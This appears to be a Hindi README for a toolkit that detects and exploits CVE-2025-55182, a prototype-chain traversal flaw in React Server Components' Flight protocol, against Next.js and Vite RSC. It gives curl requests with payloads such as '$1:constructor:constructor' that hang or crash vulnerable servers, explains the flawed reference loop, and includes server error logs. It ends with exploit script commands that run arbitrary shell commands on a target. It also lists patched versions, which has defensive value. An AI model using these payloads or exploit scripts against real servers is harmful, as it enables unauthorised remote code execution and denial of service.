
वास्तविक CVE-2025-55182 पहचान और शोषण। कोई बकवास LLM नहीं।
React Flight प्रोटोकॉल कमजोरी जो चंक संदर्भों के माध्यम से प्रोटोटाइप श्रृंखला ट्रैवर्सल की अनुमति देती है। bullshit-react-project के विरुद्ध परीक्षण।
यह थोड़ा पुराना है क्योंकि असली PoC अब सामने आ चुका है।
Vite RSC: bash ./vite-detect.sh https://example.com
Next.js: bash ./nextjs-detect.sh https://example.com
या दोनों करने के लिए बस bash ./detect.sh https://example.com चलाएँ।
दोनों स्क्रिप्ट एक वैकल्पिक टाइमआउट पैरामीटर स्वीकार करते हैं (Vite के लिए डिफ़ॉल्ट 3s, Next.js के लिए 5s)।
x-rsc-action हेडर को $1:toString पेलोड के साथ भेजता है। कमजोर सर्वर अनिश्चित काल तक हैंग रहते हैं; पैच किए गए सर्वर सामान्य रूप से प्रतिक्रिया देते हैं। पहले RSC एंडपॉइंट की जाँच करता है (अमान्य एक्शन पर HTTP 500 की उम्मीद करता है)।
पेज प्रतिक्रिया से सर्वर एक्शन आईडी (पैटर्न $ACTION_ID_<hash>) खोजता है, फिर भेजता है:
curl -X POST "http://localhost:3000" \
-H "Next-Action: <action_id>" \
-H "Accept: text/x-component" \
-F '0=["$1:a:a"]' \
-F '1={}'
कमजोर सर्वर हैंग होते हैं; पैच किए गए सर्वर जल्दी प्रतिक्रिया देते हैं।
Next.js: 16.0.7, 15.5.7, या 15.4.8 में अपग्रेड करें
React (Vite RSC): 19.0.1+, 19.1.2+, या 19.2.1+ में अपग्रेड करें
React का Flight प्रोटोकॉल चंक संदर्भों के माध्यम से प्रोटोटाइप श्रृंखला ट्रैवर्सल की अनुमति देता है। getOutlinedModel फ़ंक्शन hasOwnProperty जाँच के बिना रेफरेंस पथों पर पुनरावृत्ति करता है:
for (key = 1; key < reference.length; key++)
parentObject = parentObject[reference[key]];
यह $1:constructor:constructor को {}.constructor.constructor → Function पर ट्रैवर्स करने की अनुमति देता है।
एंडपॉइंट: कोई भी पथ जिसमें x-rsc-action हेडर हो
एक्शन ID: 710363d987f5#loginUser (या कोई भी मान्य सर्वर एक्शन)
curl -X POST "http://localhost:4173/xyz" \
-H "x-rsc-action: 710363d987f5#loginUser" \
-F '0={"then":"$1:constructor:constructor"}' \
-F '1={"a":"b"}'
कमजोर: Internal Server Error
पैच किया गया: सामान्य प्रतिक्रिया
ध्यान दें कि यदि आपके x-rsc-action ID गलत हैं तो पैच किए गए सर्वर पर आपको 500 त्रुटि मिलेगी। बस इतना है कि सर्वर लॉग अलग होंगे।
SyntaxError: Unexpected token 'function'
at Object.Function [as then] (<anonymous>)
Function कंस्ट्रक्टर को .then() के माध्यम से लागू किया गया जब ऑब्जेक्ट को await किया गया। V8 तर्क के रूप में resolve/reject फ़ंक्शन पास करता है, जो function () { [native code] } में स्ट्रिंगिफ़ाई होते हैं - इसलिए सिंटैक्स त्रुटि।
Error: server reference not found '310363d987f5'
at Object.load (file:///tmp/team_9_year_3_project/dist/rsc/index.js:13532:27)
at requireModule (file:///tmp/team_9_year_3_project/dist/rsc/index.js:8302:20)
at loadServerAction (file:///tmp/team_9_year_3_project/dist/rsc/index.js:8326:17)
at handler (file:///tmp/team_9_year_3_project/dist/rsc/index.js:14998:29)
at process.processTicksAndRejections (node:internal/process/task_queues:103:5)
TypeError: Cannot read properties of undefined (reading 'apply')
at AsyncLocalStorage.run (node:internal/async_local_storage/async_context_frame:63:14)
at runWithRequest (file:///tmp/team_9_year_3_project/dist/rsc/index.js:13539:25)
at handler (file:///tmp/team_9_year_3_project/dist/rsc/index.js:14999:27)
at process.processTicksAndRejections (node:internal/process/task_queues:103:5)
मान्य x-rsc-action के साथ कोई सर्वर लॉग नहीं दिखता। आप एक वास्तविक सर्वर एक्शन चलाकर और डेव टूल्स में अनुरोध को कैप्चर करके सही x-rsc-action पा सकते हैं।
$1:toString पेलोड कमजोर सर्वरों को अनिश्चित काल तक हैंग कर देता है - डिटेक्शन स्क्रिप्ट यही उपयोग करती हैं। मैंने लगभग सब कुछ आज़माया है लेकिन RCE प्राप्त नहीं कर सका।
Vite Rsc के लिए:
bash exploit-vite.sh https://example.com/ 'echo $(id) > /tmp/pwned'
NextJS के लिए:
bash exploit-nextjs.sh https://example.com/ 'echo $(id) > /tmp/pwned'
श्रेय maple3142 को -> https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
मैंने बस कुछ रैपिंग की और इसे Vite के लिए अनुकूलित किया जो शुद्ध ESM है और इसलिए इसमें require नहीं है।